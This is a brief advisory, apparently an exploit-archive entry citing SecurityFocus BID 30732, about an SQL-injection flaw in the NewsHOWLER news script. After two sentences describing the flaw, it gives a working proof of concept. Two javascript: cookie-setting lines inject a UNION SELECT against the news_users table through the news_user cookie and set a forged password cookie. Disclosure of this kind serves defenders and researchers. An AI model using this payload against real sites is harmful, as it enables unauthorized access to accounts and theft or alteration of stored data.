8 lines
No EOL
522 B
Text
Executable file
8 lines
No EOL
522 B
Text
Executable file
source: http://www.securityfocus.com/bid/30732/info
|
|
|
|
NewsHOWLER is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";
|
|
javascript:document.cookie = "news_password=3; path=/"; |